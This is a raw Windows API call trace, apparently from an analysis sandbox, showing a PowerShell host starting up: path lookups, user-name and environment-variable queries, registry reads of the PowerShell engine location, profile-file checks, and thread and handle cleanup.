	[0693.143] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d4b0 | out: lpFileInformation=0x12d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0693.143] SetErrorMode (uMode=0x1) returned 0x1
	[0693.143] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0693.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.143] SetErrorMode (uMode=0x1) returned 0x1
	[0693.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d4b0 | out: lpFileInformation=0x12d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.143] SetErrorMode (uMode=0x1) returned 0x1
	[0693.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.144] SetErrorMode (uMode=0x1) returned 0x1
	[0693.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d4b0 | out: lpFileInformation=0x12d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.144] SetErrorMode (uMode=0x1) returned 0x1
	[0693.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.149] SetErrorMode (uMode=0x1) returned 0x1
	[0693.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d770 | out: lpFileInformation=0x12d770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0693.149] SetErrorMode (uMode=0x1) returned 0x1
	[0693.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0693.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0693.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0693.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0701.795] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0701.795] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12dad8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12dad8) returned 0x1
	[0701.795] CoTaskMemFree (pv=0x1b7cd590) 
	[0701.795] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0701.795] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12db18 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12db18) returned 1
	[0701.796] CoTaskMemFree (pv=0x2a4bb0) 
	[0701.796] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da4fc0*="Available", lpRawData=0x2da4d50) returned 1
	[0702.502] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0702.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.502] CoTaskMemFree (pv=0x31a200) 
	[0702.502] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0702.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.502] CoTaskMemFree (pv=0x31a200) 
	[0702.504] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0702.504] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0702.504] CoTaskMemFree (pv=0x31a200) 
	[0702.504] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0702.504] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0702.504] CoTaskMemFree (pv=0x31a200) 
	[0702.506] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12daf8 | out: phkResult=0x12daf8*=0x324) returned 0x0
	[0702.506] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da7c, lpData=0x0, lpcbData=0x12da78*=0x0 | out: lpType=0x12da7c*=0x1, lpData=0x0, lpcbData=0x12da78*=0x56) returned 0x0
	[0702.507] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a5460
	[0702.507] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da4c, lpData=0x1b7a5460, lpcbData=0x12da48*=0x56 | out: lpType=0x12da4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12da48*=0x56) returned 0x0
	[0702.507] CoTaskMemFree (pv=0x1b7a5460) 
	[0702.507] RegCloseKey (hKey=0x324) returned 0x0
	[0702.508] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0702.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.508] CoTaskMemFree (pv=0x31a200) 
	[0704.357] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0704.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.357] CoTaskMemFree (pv=0x31a200) 
	[0704.367] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0704.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.367] CoTaskMemFree (pv=0x31a200) 
	[0704.368] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0704.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.368] CoTaskMemFree (pv=0x31a200) 
	[0704.368] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0704.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.369] CoTaskMemFree (pv=0x31a200) 
	[0704.370] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0704.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.370] CoTaskMemFree (pv=0x31a200) 
	[0704.373] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0704.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.373] CoTaskMemFree (pv=0x31a200) 
	[0704.374] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0706.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0706.105] CoTaskMemFree (pv=0x31a200) 
	[0708.714] CoTaskMemAlloc (cb=0x104) returned 0x31a200
	[0708.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.714] CoTaskMemFree (pv=0x31a200) 
	[0717.042] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x31a310
	[0717.045] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x31a420
	[0727.145] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0727.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.145] CoTaskMemFree (pv=0x31a530) 
	[0727.152] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0727.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.152] CoTaskMemFree (pv=0x31a530) 
	[0727.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0727.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dc58 | out: phkResult=0x12dc58*=0x388) returned 0x0
	[0728.721] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dbdc, lpData=0x0, lpcbData=0x12dbd8*=0x0 | out: lpType=0x12dbdc*=0x1, lpData=0x0, lpcbData=0x12dbd8*=0x56) returned 0x0
	[0728.721] CoTaskMemAlloc (cb=0x5a) returned 0x27c520
	[0728.721] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dbac, lpData=0x27c520, lpcbData=0x12dba8*=0x56 | out: lpType=0x12dbac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dba8*=0x56) returned 0x0
	[0728.721] CoTaskMemFree (pv=0x27c520) 
	[0728.721] RegCloseKey (hKey=0x388) returned 0x0
	[0728.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dc58 | out: phkResult=0x12dc58*=0x388) returned 0x0
	[0728.721] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dbdc, lpData=0x0, lpcbData=0x12dbd8*=0x0 | out: lpType=0x12dbdc*=0x1, lpData=0x0, lpcbData=0x12dbd8*=0x56) returned 0x0
	[0728.724] CoTaskMemAlloc (cb=0x5a) returned 0x27c520
	[0728.724] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dbac, lpData=0x27c520, lpcbData=0x12dba8*=0x56 | out: lpType=0x12dbac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dba8*=0x56) returned 0x0
	[0728.724] CoTaskMemFree (pv=0x27c520) 
	[0728.724] RegCloseKey (hKey=0x388) returned 0x0
	[0728.725] CoTaskMemAlloc (cb=0x20c) returned 0x1b79b700
	[0728.725] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b79b700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0728.725] CoTaskMemFree (pv=0x1b79b700) 
	[0728.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0728.725] CoTaskMemAlloc (cb=0x20c) returned 0x1b79b700
	[0728.725] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b79b700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0728.726] CoTaskMemFree (pv=0x1b79b700) 
	[0730.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0730.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0730.800] SetErrorMode (uMode=0x1) returned 0x1
	[0730.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dbc0 | out: lpFileInformation=0x12dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.801] SetErrorMode (uMode=0x1) returned 0x1
	[0730.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0730.801] SetErrorMode (uMode=0x1) returned 0x1
	[0730.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dbc0 | out: lpFileInformation=0x12dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.802] SetErrorMode (uMode=0x1) returned 0x1
	[0730.802] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0730.802] SetErrorMode (uMode=0x1) returned 0x1
	[0730.802] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dbc0 | out: lpFileInformation=0x12dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.802] SetErrorMode (uMode=0x1) returned 0x1
	[0730.802] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0730.802] SetErrorMode (uMode=0x1) returned 0x1
	[0730.802] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dbc0 | out: lpFileInformation=0x12dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.802] SetErrorMode (uMode=0x1) returned 0x1
	[0730.805] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.805] CoTaskMemFree (pv=0x31a530) 
	[0730.807] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.807] CoTaskMemFree (pv=0x31a530) 
	[0730.811] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.811] CoTaskMemFree (pv=0x31a530) 
	[0730.814] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.814] CoTaskMemFree (pv=0x31a530) 
	[0730.818] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.818] CoTaskMemFree (pv=0x31a530) 
	[0730.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0730.819] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x30c
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x300
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x318
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0730.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0730.823] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.823] CoTaskMemFree (pv=0x31a530) 
	[0730.825] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0730.826] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12dda0 | out: lpMode=0x12dda0) returned 1
	[0730.827] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.827] CoTaskMemFree (pv=0x31a530) 
	[0730.829] SetEvent (hEvent=0x2fc) returned 1
	[0730.829] SetEvent (hEvent=0x388) returned 1
	[0730.829] SetEvent (hEvent=0x30c) returned 1
	[0730.829] SetEvent (hEvent=0x310) returned 1
	[0730.831] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0730.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.831] CoTaskMemFree (pv=0x31a530) 
	[0730.831] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12daf8 | out: phkResult=0x12daf8*=0x348) returned 0x0
	[0730.831] RegQueryValueExW (in: hKey=0x348, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12da7c, lpData=0x0, lpcbData=0x12da78*=0x0 | out: lpType=0x12da7c*=0x0, lpData=0x0, lpcbData=0x12da78*=0x0) returned 0x2

Thread:
	id = 399
	os_tid = 0x1028


Thread:
	id = 400
	os_tid = 0x102c


Thread:
	id = 956
	os_tid = 0x19ac


Thread:
	id = 969
	os_tid = 0x19ec


Thread:
	id = 982
	os_tid = 0x1a30


Thread:
	id = 1022
	os_tid = 0x1b28


Thread:
	id = 1025
	os_tid = 0x1b38

	[0536.494] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0630.369] LocalFree (hMem=0x2672e0) returned 0x0
	[0630.370] RegCloseKey (hKey=0x320) returned 0x0
	[0630.370] LocalFree (hMem=0x267290) returned 0x0
	[0630.371] CloseHandle (hObject=0x318) returned 1
	[0630.371] CloseHandle (hObject=0x13) returned 1
	[0630.371] CloseHandle (hObject=0xf) returned 1
	[0630.372] RegCloseKey (hKey=0x300) returned 0x0
	[0630.372] RegCloseKey (hKey=0x2fc) returned 0x0
	[0630.372] RegCloseKey (hKey=0x2f8) returned 0x0
	[0661.560] RegCloseKey (hKey=0x324) returned 0x0
	[0678.103] RegCloseKey (hKey=0x324) returned 0x0
	[0699.149] RegCloseKey (hKey=0x384) returned 0x0
	[0699.149] RegCloseKey (hKey=0x380) returned 0x0
	[0699.149] RegCloseKey (hKey=0x35c) returned 0x0
	[0699.149] RegCloseKey (hKey=0x398) returned 0x0
	[0699.150] RegCloseKey (hKey=0x378) returned 0x0
	[0699.150] RegCloseKey (hKey=0x374) returned 0x0
	[0699.150] RegCloseKey (hKey=0x370) returned 0x0
	[0699.151] RegCloseKey (hKey=0x36c) returned 0x0
	[0699.151] RegCloseKey (hKey=0x368) returned 0x0
	[0699.151] RegCloseKey (hKey=0x364) returned 0x0
	[0699.151] RegCloseKey (hKey=0x360) returned 0x0
	[0699.152] RegCloseKey (hKey=0x338) returned 0x0
	[0699.152] RegCloseKey (hKey=0x394) returned 0x0
	[0699.152] RegCloseKey (hKey=0x390) returned 0x0
	[0699.152] RegCloseKey (hKey=0x358) returned 0x0
	[0699.153] RegCloseKey (hKey=0x354) returned 0x0
	[0699.153] RegCloseKey (hKey=0x350) returned 0x0
	[0699.153] RegCloseKey (hKey=0x34c) returned 0x0
	[0699.154] RegCloseKey (hKey=0x348) returned 0x0
	[0699.154] RegCloseKey (hKey=0x344) returned 0x0
	[0699.154] RegCloseKey (hKey=0x340) returned 0x0
	[0699.154] RegCloseKey (hKey=0x33c) returned 0x0
	[0699.155] RegCloseKey (hKey=0x38c) returned 0x0
	[0699.155] RegCloseKey (hKey=0x32c) returned 0x0
	[0699.155] RegCloseKey (hKey=0x328) returned 0x0
	[0699.156] RegCloseKey (hKey=0x320) returned 0x0
	[0699.156] RegCloseKey (hKey=0x318) returned 0x0
